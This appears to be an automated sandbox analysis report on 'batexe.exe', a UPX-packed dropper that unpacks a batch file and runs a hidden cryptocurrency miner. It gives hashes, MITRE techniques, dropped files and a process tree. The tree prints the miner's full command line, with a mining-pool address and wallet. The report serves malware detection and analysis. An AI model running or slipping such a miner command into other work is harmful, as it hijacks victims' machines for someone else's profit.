73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
299s
max time network
306s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
11/02/2024, 16:44

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4344	b2e.exe
5424	cpuminer-sse2.exe

Loads dropped DLL 6 IoCs

pid	Process
5424	cpuminer-sse2.exe
5424	cpuminer-sse2.exe
5424	cpuminer-sse2.exe
5424	cpuminer-sse2.exe
5424	cpuminer-sse2.exe
5424	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2128-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2128 wrote to memory of 4344	2128	batexe.exe	85
PID 2128 wrote to memory of 4344	2128	batexe.exe	85
PID 2128 wrote to memory of 4344	2128	batexe.exe	85
PID 4344 wrote to memory of 464	4344	b2e.exe	86
PID 4344 wrote to memory of 464	4344	b2e.exe	86
PID 4344 wrote to memory of 464	4344	b2e.exe	86
PID 464 wrote to memory of 5424	464	cmd.exe	89
PID 464 wrote to memory of 5424	464	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Users\Admin\AppData\Local\Temp\3208.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\3208.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\3208.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3DDF.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3208.tmp\b2e.exe

Filesize
7.3MB

MD5
33a1b8d61929ab4d4c5e3f3107d7a7b2

SHA1
c620f5f76841ef20016b82e5875d7646cea30368

SHA256
a82ff038f1466f3ef3135c6135aebfbed1cf504227257ae2a4dda7564420d1f4

SHA512
3f1cc0f4cb2a37c52cb81cb1da073180f29ccd99611504572d90c8f476d7da8217a645c9ebbf393f0413464c7bd34a6f6b9a2951500187645c2e54c5b6362f1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\3208.tmp\b2e.exe

Filesize
1.4MB

MD5
d12949103b0e724b47728239fcbb8f7e

SHA1
1aebb0f0d7bf79e745ac6ebc38b6d75f426d0b4a

SHA256
f781670c807328b5f38dadd6c9ba614df42e4150bd0ce61d0ae84dbf28085e10

SHA512
8a6da6037f38d5d267ae9b4b03548e294250e4fc72ffe2851af13c9c068389811ff611b307f661f0956408111c731b59844408ffcc0628272289229351a92b81

Download Submit
C:\Users\Admin\AppData\Local\Temp\3208.tmp\b2e.exe

Filesize
1.0MB

MD5
a4a0491ae9f9c569cfc86d3e33cf591d

SHA1
0e2d38d6e5bdae679c35dec38c54bdf4e77ecead

SHA256
bc1cdb8be6eff311fd98cee06cd4526b6755bfade38be433b035b38d358e1d26

SHA512
355c5179726c169e28f10c794fc170ed3fe932e65a8fa14dcf29fb9c17499128649154f127b687cc293eddf409e80bb853e905aac7b0d4590a5278ee278678f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\3DDF.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
203KB

MD5
ef6391d9f28c45d0c1d0d475e435820e

SHA1
43c3091e5307873f5d83d9c77812f7d7db837ed5

SHA256
bb12d27a54ca29265bb886c1cc8cff66ce866d3de4ee763adbc578093f0356eb

SHA512
9315a15475d8cd99c6ecd6a853f23471304e968af1681f47470c1fc2dd2553f14e39f61b867bf77961749fa59fa1ab750efd9b9b204b82239d38887a2d3d8837

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
149KB

MD5
50f2dbeda6b31df6ba3a76b84b6e03e5

SHA1
0481a34b7674ab97eb1949bdbb5a93b2315b0a5d

SHA256
65c8c385fa9563b79fde3d46238f08f80e46920bb24936d6ab992fb89692c419

SHA512
04baf9ef021b243f240494c13ecca9d2bd63eee9a81b587a02624ac68cae6e7dad874d57a9718fc11b4abaa97deeba6da48bfdcf1b6d462dc58ab764580da032

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
291KB

MD5
1fdd00c1369cef0f749bc58ef7fff4fc

SHA1
2ac532b547a26d689cf21277cc16b4d5b154bb3f

SHA256
bd5511f4473ecb75c63deff548c84d28c6f2dde3e6d9fce2c22f5cbd674a73a5

SHA512
c3c46e353034b144f66e56120106f3de39b77c506b6457b9c813ac3cec80153f9abb16a8793e5ae82e7fa239598a9fbad44b8b57239fe7121e96580ce5df646c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
173KB

MD5
34944ecc0a81bccec060aeb14d5a44d1

SHA1
632d4ccd173ff5ae51e0c68cc798fad2eb9c4b89

SHA256
4af8e4005006ac9e8fa9b7c32a5a0bcd64664b3e72970a0a648a99f736cafcff

SHA512
5ae9aacc5db34b58700013c9f590be33ab38866998e34b6bc632fb06428218a7cc064f608e7180731e9e12af07dcd18e167935559d1bc565218bacad771fdd7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
277KB

MD5
8d0b46b7c95727980faa49bb5972ec3a

SHA1
63491cc05e18bc45d0c1f1be901048dfadab7b11

SHA256
77f4f07b103ec1ac102c3b9666ae882e756d637c865cf0ecda68bd812637dde5

SHA512
691e71507a982d55b03072d14c5762ef84e500532c58bb8f019623312794807a616d1b0e51256aaee36fe495b3c7e5dc8c007534a9c5a2ea5925acf34ba57ea9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
279KB

MD5
cab10a547f97cf022f0f90e039e89dbc

SHA1
aee5df74827d4533204e13910a77b0dfafb36eca

SHA256
330f1955ba18c678a2746dd15849b27be49caa9971cd937eca2289017baef3d4

SHA512
b51fad418d7982c3e40fd27ccd12f99f934cc347f3462efb4becc7a374a3459c78361547f0dc92963cf1e8ad0ad9a30ad9654aeda9cb8dd1d38aaebbd53b6b7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
359KB

MD5
125d2f408c21c8ef91e4d4b1c6e88a98

SHA1
7cdf586335d905428e5183c30f9979a29c9c6e1a

SHA256
863f919fd535b3432e81e55b1b27be5b8c90e50cfff48e9420611ed55e776831

SHA512
5b16e04943a0774f27ec7042cb4ba2fafd7f0c38a53ab4344e85355ecf63985ae01c33e5d603030e1d525dd8982cc5f7438db5becea8434c507550d3d1fbb4fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
280KB

MD5
72fcbfefe70a06852f96fa58d2ac0685

SHA1
92c8fd603eb96f7642cb0ea3e2db86c2521fc71a

SHA256
45877cffea5af391601d61e20d30fd91a181bf2b517cd964416c444fbacf77b3

SHA512
2b341b0b727e7fb6497f9608ac73a266d3f2503f9e8382d893b58f992efadd45de876a4e1430814c3527838dfa0c7cc5e5118b235757075ac6cac60bbb2a5e10

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
203KB

MD5
cf9303eefbc6e87968bd2b8d7fe2e5c7

SHA1
a4174c9634f79cd38b3f325f67c8cdf769716e73

SHA256
0103ca625f570e6dede7692eba4b0fc7a866d6da23b6daeabfac7926bd9a1884

SHA512
0c8150268f9b14ac95e2d53528a5629987c9911e49ed864c604535141372cb7c3c0b4b110956531e3f839c465c4062c6e3d3b9c90acd7c81da81edf52d4ebacc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
176KB

MD5
67e4c78a9b50e071735820ab6cc333e8

SHA1
5f189c6e4830d03c25b98c114cd6375ddd5521a6

SHA256
e06a929d334ac0583f61b4d6d538982e2eeb6939bf72e99b14f13bd06d629f4b

SHA512
25dd6b3befaee65f0f38144c30cc5e9946c243b7d6a241bd0d298a4780a8a8e659d1a81725ca1598ae0c8b2bc44a915fb07403762d58e4560477413f82cd1004

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
240KB

MD5
4381d63d3e9e866782da2ba8be60d95b

SHA1
bc3354adc2d95fe60c22dc87eab06bbda5cb813b

SHA256
dc0430feb5e9b323ad313763d6b41a4f2f4b5117852b619b8c4776993f514dea

SHA512
70ef12d51055408e0ccddcbbcddaac3d2e57f7a26ea8ed916cdfe4589a20cd84ab1f0a732ed24ed836f9adffeae6b31a28c7eda9804ff24a3bfecf9a518e2bcd

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
186KB

MD5
844466ff22de2caab80d9ee9fa2b2f6c

SHA1
80e0d2f42ba2ffc4ddbc895b6022c0b48b9dbcd3

SHA256
b9772c303e19e13137e4227f079fd44afb1277ae471df69a489e25386cc119be

SHA512
14083943ffbdec116a17b0c56bbcbd38473f23b06f93d10970a484ccef790f2085dc388301505988adeaa9f6e30fd257216f54bc189f0a37cfc3ff89441a374a

Download Submit
memory/2128-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4344-55-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4344-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5424-47-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/5424-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-42-0x0000000001020000-0x00000000010DC000-memory.dmp

Filesize
752KB

Download
memory/5424-48-0x0000000001020000-0x00000000010DC000-memory.dmp

Filesize
752KB

Download
memory/5424-49-0x0000000065FD0000-0x0000000066068000-memory.dmp

Filesize
608KB

Download
memory/5424-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-46-0x000000006FC40000-0x00000000714F5000-memory.dmp

Filesize
24.7MB

Download
memory/5424-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-96-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/5424-106-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download